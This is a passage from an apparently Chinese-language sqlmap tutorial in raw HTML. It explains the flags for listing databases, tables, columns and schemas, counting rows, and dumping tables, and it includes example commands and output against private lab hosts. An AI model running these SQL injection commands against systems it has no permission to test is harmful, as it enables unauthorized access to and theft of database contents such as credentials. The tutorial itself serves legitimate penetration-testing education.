id=\"%E5%88%97%E5%87%BA%E6%95%B0%E6%8D%AE%E5%BA%93%E7%B3%BB%E7%BB%9F%E7%9A%84%E6%95%B0%E6%8D%AE%E5%BA%93\"><\/span>\n\t<span style=\"font-weight:bold;font-size:13.5000pt;font-family:'\u5b8b\u4f53';\">\u5217\u51fa\u6570\u636e\u5e93\u7cfb\u7edf\u7684\u6570\u636e\u5e93<\/span><span style=\"font-weight:bold;font-size:13.5000pt;font-family:'\u5b8b\u4f53';\"><\/span><br \/>\n<span class=\"ez-toc-section-end\"><\/span><\/h3>\n<p class=\"p18\">\n\t<span style=\"font-size:12.0000pt;font-family:'Times New Roman';\">\u53c2\u6570\uff1a<span>&#8211;dbs<\/span><\/span><span style=\"font-size:12.0000pt;font-family:'Times New Roman';\"><\/span>\n<\/p>\n<p class=\"p18\">\n\t<span style=\"font-size:12.0000pt;font-family:'Times New Roman';\">\u5f53\u524d\u7528\u6237\u6709\u6743\u9650\u8bfb\u53d6\u5305\u542b\u6240\u6709\u6570\u636e\u5e93\u5217\u8868\u4fe1\u606f\u7684\u8868\u4e2d\u7684\u65f6\u5019\uff0c\u5373\u53ef\u5217\u51fa\u6240\u6709\u7684\u6570\u636e\u5e93\u3002<\/span><span style=\"font-size:12.0000pt;font-family:'Times New Roman';\"><\/span>\n<\/p>\n<h3><span class=\"ez-toc-section\" id=\"%E5%88%97%E4%B8%BE%E6%95%B0%E6%8D%AE%E5%BA%93%E8%A1%A8\"><\/span>\n\t<span style=\"font-weight:bold;font-size:13.5000pt;font-family:'\u5b8b\u4f53';\">\u5217\u4e3e\u6570\u636e\u5e93\u8868<\/span><span style=\"font-weight:bold;font-size:13.5000pt;font-family:'\u5b8b\u4f53';\"><\/span><br \/>\n<span class=\"ez-toc-section-end\"><\/span><\/h3>\n<p class=\"p18\">\n\t<span style=\"font-size:12.0000pt;font-family:'Times New Roman';\">\u53c2\u6570\uff1a<span>&#8211;tables,&#8211;exclude-sysdbs,-D<\/span><\/span><span style=\"font-size:12.0000pt;font-family:'Times New Roman';\"><\/span>\n<\/p>\n<p class=\"p18\">\n\t<span style=\"font-size:12.0000pt;font-family:'Times New Roman';\">\u5f53\u524d\u7528\u6237\u6709\u6743\u9650\u8bfb\u53d6\u5305\u542b\u6240\u6709\u6570\u636e\u5e93\u8868\u4fe1\u606f\u7684\u8868\u4e2d\u7684\u65f6\u5019\uff0c\u5373\u53ef\u5217\u51fa\u4e00\u4e2a\u7279\u5b9a\u6570\u636e\u7684\u6240\u6709\u8868\u3002<\/span><span style=\"font-size:12.0000pt;font-family:'Times New Roman';\"><\/span>\n<\/p>\n<p class=\"p18\">\n\t<span style=\"font-size:12.0000pt;font-family:'Times New Roman';\">\u5982\u679c\u4f60\u4e0d\u63d0\u4f9b<span>-D<\/span><span>\u53c2\u6570\u6765\u5217\u6307\u5b9a\u7684\u4e00\u4e2a\u6570\u636e\u7684\u65f6\u5019\uff0c<\/span><span>sqlmap<\/span><span>\u4f1a\u5217\u51fa\u6570\u636e\u5e93\u6240\u6709\u5e93\u7684\u6240\u6709\u8868\u3002<\/span><\/span><span style=\"font-size:12.0000pt;font-family:'Times New Roman';\"><\/span>\n<\/p>\n<p class=\"p18\">\n\t<span style=\"font-size:12.0000pt;font-family:'Times New Roman';\">&#8211;exclude-sysdbs<span>\u53c2\u6570\u662f\u6307\u5305\u542b\u4e86\u6240\u6709\u7684\u7cfb\u7edf\u6570\u636e\u5e93\u3002<\/span><\/span><span style=\"font-size:12.0000pt;font-family:'Times New Roman';\"><\/span>\n<\/p>\n<p class=\"p18\">\n\t<span style=\"font-size:12.0000pt;font-family:'Times New Roman';\">\u9700\u8981\u6ce8\u610f\u7684\u662f\u5728<span>Oracle<\/span><span>\u4e2d\u4f60\u9700\u8981\u63d0\u4f9b\u7684\u662f<\/span><span>TABLESPACE_NAME<\/span><span>\u800c\u4e0d\u662f\u6570\u636e\u5e93\u540d\u79f0\u3002<\/span><\/span><span style=\"font-size:12.0000pt;font-family:'Times New Roman';\"><\/span>\n<\/p>\n<h3><span class=\"ez-toc-section\" id=\"%E5%88%97%E4%B8%BE%E6%95%B0%E6%8D%AE%E5%BA%93%E8%A1%A8%E4%B8%AD%E7%9A%84%E5%AD%97%E6%AE%B5\"><\/span>\n\t<span style=\"font-weight:bold;font-size:13.5000pt;font-family:'\u5b8b\u4f53';\">\u5217\u4e3e\u6570\u636e\u5e93\u8868\u4e2d\u7684\u5b57\u6bb5<\/span><span style=\"font-weight:bold;font-size:13.5000pt;font-family:'\u5b8b\u4f53';\"><\/span><br \/>\n<span class=\"ez-toc-section-end\"><\/span><\/h3>\n<p class=\"p18\">\n\t<span style=\"font-size:12.0000pt;font-family:'Times New Roman';\">\u53c2\u6570\uff1a<span>&#8211;columns,-C,-T,-D<\/span><\/span><span style=\"font-size:12.0000pt;font-family:'Times New Roman';\"><\/span>\n<\/p>\n<p class=\"p18\">\n\t<span style=\"font-size:12.0000pt;font-family:'Times New Roman';\">\u5f53\u524d\u7528\u6237\u6709\u6743\u9650\u8bfb\u53d6\u5305\u542b\u6240\u6709\u6570\u636e\u5e93\u8868\u4fe1\u606f\u7684\u8868\u4e2d\u7684\u65f6\u5019\uff0c\u5373\u53ef\u5217\u51fa\u6307\u5b9a\u6570\u636e\u5e93\u8868\u4e2d\u7684\u5b57\u6bb5\uff0c\u540c\u65f6\u4e5f\u4f1a\u5217\u51fa\u5b57\u6bb5\u7684\u6570\u636e\u7c7b\u578b\u3002<\/span><span style=\"font-size:12.0000pt;font-family:'Times New Roman';\"><\/span>\n<\/p>\n<p class=\"p18\">\n\t<span style=\"font-size:12.0000pt;font-family:'Times New Roman';\">\u5982\u679c\u6ca1\u6709\u4f7f\u7528<span>-D<\/span><span>\u53c2\u6570\u6307\u5b9a\u6570\u636e\u5e93\u65f6\uff0c\u9ed8\u8ba4\u4f1a\u4f7f\u7528\u5f53\u524d\u6570\u636e\u5e93\u3002<\/span><\/span><span style=\"font-size:12.0000pt;font-family:'Times New Roman';\"><\/span>\n<\/p>\n<p class=\"p18\">\n\t<span style=\"font-size:12.0000pt;font-family:'Times New Roman';\">\u5217\u4e3e\u4e00\u4e2a<span>SQLite<\/span><span>\u7684\u4f8b\u5b50\uff1a<\/span><\/span><span style=\"font-size:12.0000pt;font-family:'Times New Roman';\"><\/span>\n<\/p>\n<p class=\"p17\">\n\t<span class=\"16\" style=\"font-size:10.0000pt;font-family:'Courier New';\">$&nbsp;python&nbsp;sqlmap.py&nbsp;-u&nbsp;&#8220;http:\/\/192.168.136.131\/sqlmap\/sqlite\/get_int.php?id=1&#8221;&nbsp;&#8211;columns&nbsp;-D&nbsp;testdb&nbsp;-T&nbsp;users&nbsp;-C&nbsp;name<\/span><span class=\"16\" style=\"font-size:10.0000pt;font-family:'Courier New';\"><\/span><span class=\"16\" style=\"font-size:10.0000pt;font-family:'Courier New';\">[&#8230;]<\/span><span class=\"16\" style=\"font-size:10.0000pt;font-family:'Courier New';\"><\/span><span class=\"16\" style=\"font-size:10.0000pt;font-family:'Courier New';\">Database:&nbsp;SQLite_masterdb<\/span><span class=\"16\" style=\"font-size:10.0000pt;font-family:'Courier New';\"><\/span><span class=\"16\" style=\"font-size:10.0000pt;font-family:'Courier New';\">Table:&nbsp;users<\/span><span class=\"16\" style=\"font-size:10.0000pt;font-family:'Courier New';\"><\/span><span class=\"16\" style=\"font-size:10.0000pt;font-family:'Courier New';\">[3&nbsp;columns]<\/span><span class=\"16\" style=\"font-size:10.0000pt;font-family:'Courier New';\"><\/span><span class=\"16\" style=\"font-size:10.0000pt;font-family:'Courier New';\">+&#8212;&#8212;&#8212;+&#8212;&#8212;&#8212;+<\/span><span class=\"16\" style=\"font-size:10.0000pt;font-family:'Courier New';\"><\/span><span class=\"16\" style=\"font-size:10.0000pt;font-family:'Courier New';\">|&nbsp;Column&nbsp;&nbsp;|&nbsp;Type&nbsp;&nbsp;&nbsp;&nbsp;|<\/span><span class=\"16\" style=\"font-size:10.0000pt;font-family:'Courier New';\"><\/span><span class=\"16\" style=\"font-size:10.0000pt;font-family:'Courier New';\">+&#8212;&#8212;&#8212;+&#8212;&#8212;&#8212;+<\/span><span class=\"16\" style=\"font-size:10.0000pt;font-family:'Courier New';\"><\/span><span class=\"16\" style=\"font-size:10.0000pt;font-family:'Courier New';\">|&nbsp;id&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;|&nbsp;INTEGER&nbsp;|<\/span><span class=\"16\" style=\"font-size:10.0000pt;font-family:'Courier New';\"><\/span><span class=\"16\" style=\"font-size:10.0000pt;font-family:'Courier New';\">|&nbsp;name&nbsp;&nbsp;&nbsp;&nbsp;|&nbsp;TEXT&nbsp;&nbsp;&nbsp;&nbsp;|<\/span><span class=\"16\" style=\"font-size:10.0000pt;font-family:'Courier New';\"><\/span><span class=\"16\" style=\"font-size:10.0000pt;font-family:'Courier New';\">|&nbsp;surname&nbsp;|&nbsp;TEXT&nbsp;&nbsp;&nbsp;&nbsp;|<\/span><span class=\"16\" style=\"font-size:10.0000pt;font-family:'Courier New';\"><\/span><span class=\"16\" style=\"font-size:10.0000pt;font-family:'Courier New';\">+&#8212;&#8212;&#8212;+&#8212;&#8212;&#8212;+<\/span><span style=\"font-size:12.0000pt;font-family:'\u5b8b\u4f53';\"><\/span>\n<\/p>\n<h3><span class=\"ez-toc-section\" id=\"%E5%88%97%E4%B8%BE%E6%95%B0%E6%8D%AE%E5%BA%93%E7%B3%BB%E7%BB%9F%E7%9A%84%E6%9E%B6%E6%9E%84\"><\/span>\n\t<span style=\"font-weight:bold;font-size:13.5000pt;font-family:'\u5b8b\u4f53';\">\u5217\u4e3e\u6570\u636e\u5e93\u7cfb\u7edf\u7684\u67b6\u6784<\/span><span style=\"font-weight:bold;font-size:13.5000pt;font-family:'\u5b8b\u4f53';\"><\/span><br \/>\n<span class=\"ez-toc-section-end\"><\/span><\/h3>\n<p class=\"p18\">\n\t<span style=\"font-size:12.0000pt;font-family:'Times New Roman';\">\u53c2\u6570\uff1a<span>&#8211;schema,&#8211;exclude-sysdbs<\/span><\/span><span style=\"font-size:12.0000pt;font-family:'Times New Roman';\"><\/span>\n<\/p>\n<p class=\"p18\">\n\t<span style=\"font-size:12.0000pt;font-family:'Times New Roman';\">\u7528\u6237\u53ef\u4ee5\u7528\u6b64\u53c2\u6570\u83b7\u53d6\u6570\u636e\u5e93\u7684\u67b6\u6784\uff0c\u5305\u542b\u6240\u6709\u7684\u6570\u636e\u5e93\uff0c\u8868\u548c\u5b57\u6bb5\uff0c\u4ee5\u53ca\u5404\u81ea\u7684\u7c7b\u578b\u3002<\/span><span style=\"font-size:12.0000pt;font-family:'Times New Roman';\"><\/span>\n<\/p>\n<p class=\"p18\">\n\t<span style=\"font-size:12.0000pt;font-family:'Times New Roman';\">\u52a0\u4e0a<span>&#8211;exclude-sysdbs<\/span><span>\u53c2\u6570\uff0c\u5c06\u4e0d\u4f1a\u83b7\u53d6\u6570\u636e\u5e93\u81ea\u5e26\u7684\u7cfb\u7edf\u5e93\u5185\u5bb9\u3002<\/span><\/span><span style=\"font-size:12.0000pt;font-family:'Times New Roman';\"><\/span>\n<\/p>\n<p class=\"p18\">\n\t<span style=\"font-size:12.0000pt;font-family:'Times New Roman';\">MySQL<span>\u4f8b\u5b50\uff1a<\/span><\/span><span style=\"font-size:12.0000pt;font-family:'Times New Roman';\"><\/span>\n<\/p>\n<p class=\"p17\">\n\t<span class=\"16\" style=\"font-size:10.0000pt;font-family:'Courier New';\">$&nbsp;python&nbsp;sqlmap.py&nbsp;-u&nbsp;&#8220;http:\/\/192.168.48.130\/sqlmap\/mysql\/get_int.php?id=1&#8221;&nbsp;&#8211;schema&nbsp;&#8211;batch&nbsp;&#8211;exclude-sysdbs<\/span><span class=\"16\" style=\"font-size:10.0000pt;font-family:'Courier New';\"><\/span><span class=\"16\" style=\"font-size:10.0000pt;font-family:'Courier New';\">[&#8230;]<\/span><span class=\"16\" style=\"font-size:10.0000pt;font-family:'Courier New';\"><\/span><span class=\"16\" style=\"font-size:10.0000pt;font-family:'Courier New';\">Database:&nbsp;owasp10<\/span><span class=\"16\" style=\"font-size:10.0000pt;font-family:'Courier New';\"><\/span><span class=\"16\" style=\"font-size:10.0000pt;font-family:'Courier New';\">Table:&nbsp;accounts<\/span><span class=\"16\" style=\"font-size:10.0000pt;font-family:'Courier New';\"><\/span><span class=\"16\" style=\"font-size:10.0000pt;font-family:'Courier New';\">[4&nbsp;columns]<\/span><span class=\"16\" style=\"font-size:10.0000pt;font-family:'Courier New';\"><\/span><span class=\"16\" style=\"font-size:10.0000pt;font-family:'Courier New';\">+&#8212;&#8212;&#8212;&#8212;-+&#8212;&#8212;&#8212;+<\/span><span class=\"16\" style=\"font-size:10.0000pt;font-family:'Courier New';\"><\/span><span class=\"16\" style=\"font-size:10.0000pt;font-family:'Courier New';\">|&nbsp;Column&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;|&nbsp;Type&nbsp;&nbsp;&nbsp;&nbsp;|<\/span><span class=\"16\" style=\"font-size:10.0000pt;font-family:'Courier New';\"><\/span><span class=\"16\" style=\"font-size:10.0000pt;font-family:'Courier New';\">+&#8212;&#8212;&#8212;&#8212;-+&#8212;&#8212;&#8212;+<\/span><span class=\"16\" style=\"font-size:10.0000pt;font-family:'Courier New';\"><\/span><span class=\"16\" style=\"font-size:10.0000pt;font-family:'Courier New';\">|&nbsp;cid&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;|&nbsp;int(11)&nbsp;|<\/span><span class=\"16\" style=\"font-size:10.0000pt;font-family:'Courier New';\"><\/span><span class=\"16\" style=\"font-size:10.0000pt;font-family:'Courier New';\">|&nbsp;mysignature&nbsp;|&nbsp;text&nbsp;&nbsp;&nbsp;&nbsp;|<\/span><span class=\"16\" style=\"font-size:10.0000pt;font-family:'Courier New';\"><\/span><span class=\"16\" style=\"font-size:10.0000pt;font-family:'Courier New';\">|&nbsp;password&nbsp;&nbsp;&nbsp;&nbsp;|&nbsp;text&nbsp;&nbsp;&nbsp;&nbsp;|<\/span><span class=\"16\" style=\"font-size:10.0000pt;font-family:'Courier New';\"><\/span><span class=\"16\" style=\"font-size:10.0000pt;font-family:'Courier New';\">|&nbsp;username&nbsp;&nbsp;&nbsp;&nbsp;|&nbsp;text&nbsp;&nbsp;&nbsp;&nbsp;|<\/span><span class=\"16\" style=\"font-size:10.0000pt;font-family:'Courier New';\"><\/span><span class=\"16\" style=\"font-size:10.0000pt;font-family:'Courier New';\">+&#8212;&#8212;&#8212;&#8212;-+&#8212;&#8212;&#8212;+<\/span><span class=\"16\" style=\"font-size:10.0000pt;font-family:'Courier New';\"><\/span><span class=\"16\" style=\"font-size:10.0000pt;font-family:'Courier New';\">&nbsp;<\/span><span class=\"16\" style=\"font-size:10.0000pt;font-family:'Courier New';\">Database:&nbsp;owasp10<\/span><span class=\"16\" style=\"font-size:10.0000pt;font-family:'Courier New';\"><\/span><span class=\"16\" style=\"font-size:10.0000pt;font-family:'Courier New';\">Table:&nbsp;blogs_table<\/span><span class=\"16\" style=\"font-size:10.0000pt;font-family:'Courier New';\"><\/span><span class=\"16\" style=\"font-size:10.0000pt;font-family:'Courier New';\">[4&nbsp;columns]<\/span><span class=\"16\" style=\"font-size:10.0000pt;font-family:'Courier New';\"><\/span><span class=\"16\" style=\"font-size:10.0000pt;font-family:'Courier New';\">+&#8212;&#8212;&#8212;&#8212;&#8211;+&#8212;&#8212;&#8212;-+<\/span><span class=\"16\" style=\"font-size:10.0000pt;font-family:'Courier New';\"><\/span><span class=\"16\" style=\"font-size:10.0000pt;font-family:'Courier New';\">|&nbsp;Column&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;|&nbsp;Type&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;|<\/span><span class=\"16\" style=\"font-size:10.0000pt;font-family:'Courier New';\"><\/span><span class=\"16\" style=\"font-size:10.0000pt;font-family:'Courier New';\">+&#8212;&#8212;&#8212;&#8212;&#8211;+&#8212;&#8212;&#8212;-+<\/span><span class=\"16\" style=\"font-size:10.0000pt;font-family:'Courier New';\"><\/span><span class=\"16\" style=\"font-size:10.0000pt;font-family:'Courier New';\">|&nbsp;date&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;|&nbsp;datetime&nbsp;|<\/span><span class=\"16\" style=\"font-size:10.0000pt;font-family:'Courier New';\"><\/span><span class=\"16\" style=\"font-size:10.0000pt;font-family:'Courier New';\">|&nbsp;blogger_name&nbsp;|&nbsp;text&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;|<\/span><span class=\"16\" style=\"font-size:10.0000pt;font-family:'Courier New';\"><\/span><span class=\"16\" style=\"font-size:10.0000pt;font-family:'Courier New';\">|&nbsp;cid&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;|&nbsp;int(11)&nbsp;&nbsp;|<\/span><span class=\"16\" style=\"font-size:10.0000pt;font-family:'Courier New';\"><\/span><span class=\"16\" style=\"font-size:10.0000pt;font-family:'Courier New';\">|&nbsp;comment&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;|&nbsp;text&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;|<\/span><span class=\"16\" style=\"font-size:10.0000pt;font-family:'Courier New';\"><\/span><span class=\"16\" style=\"font-size:10.0000pt;font-family:'Courier New';\">+&#8212;&#8212;&#8212;&#8212;&#8211;+&#8212;&#8212;&#8212;-+<\/span><span class=\"16\" style=\"font-size:10.0000pt;font-family:'Courier New';\"><\/span><span class=\"16\" style=\"font-size:10.0000pt;font-family:'Courier New';\">&nbsp;<\/span><span class=\"16\" style=\"font-size:10.0000pt;font-family:'Courier New';\">Database:&nbsp;owasp10<\/span><span class=\"16\" style=\"font-size:10.0000pt;font-family:'Courier New';\"><\/span><span class=\"16\" style=\"font-size:10.0000pt;font-family:'Courier New';\">Table:&nbsp;hitlog<\/span><span class=\"16\" style=\"font-size:10.0000pt;font-family:'Courier New';\"><\/span><span class=\"16\" style=\"font-size:10.0000pt;font-family:'Courier New';\">[6&nbsp;columns]<\/span><span class=\"16\" style=\"font-size:10.0000pt;font-family:'Courier New';\"><\/span><span class=\"16\" style=\"font-size:10.0000pt;font-family:'Courier New';\">+&#8212;&#8212;&#8212;-+&#8212;&#8212;&#8212;-+<\/span><span class=\"16\" style=\"font-size:10.0000pt;font-family:'Courier New';\"><\/span><span class=\"16\" style=\"font-size:10.0000pt;font-family:'Courier New';\">|&nbsp;Column&nbsp;&nbsp;&nbsp;|&nbsp;Type&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;|<\/span><span class=\"16\" style=\"font-size:10.0000pt;font-family:'Courier New';\"><\/span><span class=\"16\" style=\"font-size:10.0000pt;font-family:'Courier New';\">+&#8212;&#8212;&#8212;-+&#8212;&#8212;&#8212;-+<\/span><span class=\"16\" style=\"font-size:10.0000pt;font-family:'Courier New';\"><\/span><span class=\"16\" style=\"font-size:10.0000pt;font-family:'Courier New';\">|&nbsp;date&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;|&nbsp;datetime&nbsp;|<\/span><span class=\"16\" style=\"font-size:10.0000pt;font-family:'Courier New';\"><\/span><span class=\"16\" style=\"font-size:10.0000pt;font-family:'Courier New';\">|&nbsp;browser&nbsp;&nbsp;|&nbsp;text&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;|<\/span><span class=\"16\" style=\"font-size:10.0000pt;font-family:'Courier New';\"><\/span><span class=\"16\" style=\"font-size:10.0000pt;font-family:'Courier New';\">|&nbsp;cid&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;|&nbsp;int(11)&nbsp;&nbsp;|<\/span><span class=\"16\" style=\"font-size:10.0000pt;font-family:'Courier New';\"><\/span><span class=\"16\" style=\"font-size:10.0000pt;font-family:'Courier New';\">|&nbsp;hostname&nbsp;|&nbsp;text&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;|<\/span><span class=\"16\" style=\"font-size:10.0000pt;font-family:'Courier New';\"><\/span><span class=\"16\" style=\"font-size:10.0000pt;font-family:'Courier New';\">|&nbsp;ip&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;|&nbsp;text&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;|<\/span><span class=\"16\" style=\"font-size:10.0000pt;font-family:'Courier New';\"><\/span><span class=\"16\" style=\"font-size:10.0000pt;font-family:'Courier New';\">|&nbsp;referer&nbsp;&nbsp;|&nbsp;text&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;|<\/span><span class=\"16\" style=\"font-size:10.0000pt;font-family:'Courier New';\"><\/span><span class=\"16\" style=\"font-size:10.0000pt;font-family:'Courier New';\">+&#8212;&#8212;&#8212;-+&#8212;&#8212;&#8212;-+<\/span><span class=\"16\" style=\"font-size:10.0000pt;font-family:'Courier New';\"><\/span><span class=\"16\" style=\"font-size:10.0000pt;font-family:'Courier New';\">&nbsp;<\/span><span class=\"16\" style=\"font-size:10.0000pt;font-family:'Courier New';\">Database:&nbsp;testdb<\/span><span class=\"16\" style=\"font-size:10.0000pt;font-family:'Courier New';\"><\/span><span class=\"16\" style=\"font-size:10.0000pt;font-family:'Courier New';\">Table:&nbsp;users<\/span><span class=\"16\" style=\"font-size:10.0000pt;font-family:'Courier New';\"><\/span><span class=\"16\" style=\"font-size:10.0000pt;font-family:'Courier New';\">[3&nbsp;columns]<\/span><span class=\"16\" style=\"font-size:10.0000pt;font-family:'Courier New';\"><\/span><span class=\"16\" style=\"font-size:10.0000pt;font-family:'Courier New';\">+&#8212;&#8212;&#8212;+&#8212;&#8212;&#8212;&#8212;&#8212;+<\/span><span class=\"16\" style=\"font-size:10.0000pt;font-family:'Courier New';\"><\/span><span class=\"16\" style=\"font-size:10.0000pt;font-family:'Courier New';\">|&nbsp;Column&nbsp;&nbsp;|&nbsp;Type&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;|<\/span><span class=\"16\" style=\"font-size:10.0000pt;font-family:'Courier New';\"><\/span><span class=\"16\" style=\"font-size:10.0000pt;font-family:'Courier New';\">+&#8212;&#8212;&#8212;+&#8212;&#8212;&#8212;&#8212;&#8212;+<\/span><span class=\"16\" style=\"font-size:10.0000pt;font-family:'Courier New';\"><\/span><span class=\"16\" style=\"font-size:10.0000pt;font-family:'Courier New';\">|&nbsp;id&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;|&nbsp;int(11)&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;|<\/span><span class=\"16\" style=\"font-size:10.0000pt;font-family:'Courier New';\"><\/span><span class=\"16\" style=\"font-size:10.0000pt;font-family:'Courier New';\">|&nbsp;name&nbsp;&nbsp;&nbsp;&nbsp;|&nbsp;varchar(500)&nbsp;&nbsp;|<\/span><span class=\"16\" style=\"font-size:10.0000pt;font-family:'Courier New';\"><\/span><span class=\"16\" style=\"font-size:10.0000pt;font-family:'Courier New';\">|&nbsp;surname&nbsp;|&nbsp;varchar(1000)&nbsp;|<\/span><span class=\"16\" style=\"font-size:10.0000pt;font-family:'Courier New';\"><\/span><span class=\"16\" style=\"font-size:10.0000pt;font-family:'Courier New';\">+&#8212;&#8212;&#8212;+&#8212;&#8212;&#8212;&#8212;&#8212;+<\/span><span class=\"16\" style=\"font-size:10.0000pt;font-family:'Courier New';\"><\/span><span class=\"16\" style=\"font-size:10.0000pt;font-family:'Courier New';\">[&#8230;]<\/span><span style=\"font-size:12.0000pt;font-family:'\u5b8b\u4f53';\"><\/span>\n<\/p>\n<h3><span class=\"ez-toc-section\" id=\"%E8%8E%B7%E5%8F%96%E8%A1%A8%E4%B8%AD%E6%95%B0%E6%8D%AE%E4%B8%AA%E6%95%B0\"><\/span>\n\t<span style=\"font-weight:bold;font-size:13.5000pt;font-family:'\u5b8b\u4f53';\">\u83b7\u53d6\u8868\u4e2d\u6570\u636e\u4e2a\u6570<\/span><span style=\"font-weight:bold;font-size:13.5000pt;font-family:'\u5b8b\u4f53';\"><\/span><br \/>\n<span class=\"ez-toc-section-end\"><\/span><\/h3>\n<p class=\"p18\">\n\t<span style=\"font-size:12.0000pt;font-family:'Times New Roman';\">\u53c2\u6570\uff1a<span>&#8211;count<\/span><\/span><span style=\"font-size:12.0000pt;font-family:'Times New Roman';\"><\/span>\n<\/p>\n<p class=\"p18\">\n\t<span style=\"font-size:12.0000pt;font-family:'Times New Roman';\">\u6709\u65f6\u5019\u7528\u6237\u53ea\u60f3\u83b7\u53d6\u8868\u4e2d\u7684\u6570\u636e\u4e2a\u6570\u800c\u4e0d\u662f\u5177\u4f53\u7684\u5185\u5bb9\uff0c\u90a3\u4e48\u5c31\u53ef\u4ee5\u4f7f\u7528\u8fd9\u4e2a\u53c2\u6570\u3002<\/span><span style=\"font-size:12.0000pt;font-family:'Times New Roman';\"><\/span>\n<\/p>\n<p class=\"p18\">\n\t<span style=\"font-size:12.0000pt;font-family:'Times New Roman';\">\u5217\u4e3e\u4e00\u4e2a<span>Microsoft&nbsp;SQL&nbsp;Server<\/span><span>\u4f8b\u5b50\uff1a<\/span><\/span><span style=\"font-size:12.0000pt;font-family:'Times New Roman';\"><\/span>\n<\/p>\n<p class=\"p17\">\n\t<span class=\"16\" style=\"font-size:10.0000pt;font-family:'Courier New';\">$&nbsp;python&nbsp;sqlmap.py&nbsp;-u&nbsp;&#8220;http:\/\/192.168.21.129\/sqlmap\/mssql\/iis\/get_int.asp?id=1&#8221;&nbsp;&#8211;count&nbsp;-D&nbsp;testdb<\/span><span class=\"16\" style=\"font-size:10.0000pt;font-family:'Courier New';\"><\/span><span class=\"16\" style=\"font-size:10.0000pt;font-family:'Courier New';\">[&#8230;]<\/span><span class=\"16\" style=\"font-size:10.0000pt;font-family:'Courier New';\"><\/span><span class=\"16\" style=\"font-size:10.0000pt;font-family:'Courier New';\">Database:&nbsp;testdb<\/span><span class=\"16\" style=\"font-size:10.0000pt;font-family:'Courier New';\"><\/span><span class=\"16\" style=\"font-size:10.0000pt;font-family:'Courier New';\">+&#8212;&#8212;&#8212;&#8212;&#8212;-+&#8212;&#8212;&#8212;+<\/span><span class=\"16\" style=\"font-size:10.0000pt;font-family:'Courier New';\"><\/span><span class=\"16\" style=\"font-size:10.0000pt;font-family:'Courier New';\">|&nbsp;Table&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;|&nbsp;Entries&nbsp;|<\/span><span class=\"16\" style=\"font-size:10.0000pt;font-family:'Courier New';\"><\/span><span class=\"16\" style=\"font-size:10.0000pt;font-family:'Courier New';\">+&#8212;&#8212;&#8212;&#8212;&#8212;-+&#8212;&#8212;&#8212;+<\/span><span class=\"16\" style=\"font-size:10.0000pt;font-family:'Courier New';\"><\/span><span class=\"16\" style=\"font-size:10.0000pt;font-family:'Courier New';\">|&nbsp;dbo.users&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;|&nbsp;4&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;|<\/span><span class=\"16\" style=\"font-size:10.0000pt;font-family:'Courier New';\"><\/span><span class=\"16\" style=\"font-size:10.0000pt;font-family:'Courier New';\">|&nbsp;dbo.users_blob&nbsp;|&nbsp;2&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;|<\/span><span class=\"16\" style=\"font-size:10.0000pt;font-family:'Courier New';\"><\/span><span class=\"16\" style=\"font-size:10.0000pt;font-family:'Courier New';\">+&#8212;&#8212;&#8212;&#8212;&#8212;-+&#8212;&#8212;&#8212;+<\/span><span style=\"font-size:12.0000pt;font-family:'\u5b8b\u4f53';\"><\/span>\n<\/p>\n<h3><span class=\"ez-toc-section\" id=\"%E8%8E%B7%E5%8F%96%E6%95%B4%E4%B8%AA%E8%A1%A8%E7%9A%84%E6%95%B0%E6%8D%AE\"><\/span>\n\t<span style=\"font-weight:bold;font-size:13.5000pt;font-family:'\u5b8b\u4f53';\">\u83b7\u53d6\u6574\u4e2a\u8868\u7684\u6570\u636e<\/span><span style=\"font-weight:bold;font-size:13.5000pt;font-family:'\u5b8b\u4f53';\"><\/span><br \/>\n<span class=\"ez-toc-section-end\"><\/span><\/h3>\n<p class=\"p18\">\n\t<span style=\"font-size:12.0000pt;font-family:'Times New Roman';\">\u53c2\u6570\uff1a<span>&#8211;dump,-C,-T,-D,&#8211;start,&#8211;stop,&#8211;first,&#8211;last<\/span><\/span><span style=\"font-size:12.0000pt;font-family:'Times New Roman';\"><\/span>\n<\/p>\n<p class=\"p18\">\n\t<span style=\"font-size:12.0000pt;font-family:'Times New Roman';\">\u5982\u679c\u5f53\u524d\u7ba1\u7406\u5458\u6709\u6743\u9650\u8bfb\u53d6\u6570\u636e\u5e93\u5176\u4e2d\u7684\u4e00\u4e2a\u8868\u7684\u8bdd\uff0c\u90a3\u4e48\u5c31\u80fd\u83b7\u53d6\u771f\u4e2a\u8868\u7684\u6240\u6709\u5185\u5bb9\u3002<\/span><span style=\"font-size:12.0000pt;font-family:'Times New Roman';\"><\/span>\n<\/p>\n<p class=\"p18\">\n\t<span style=\"font-size:12.0000pt;font-family:'Times New 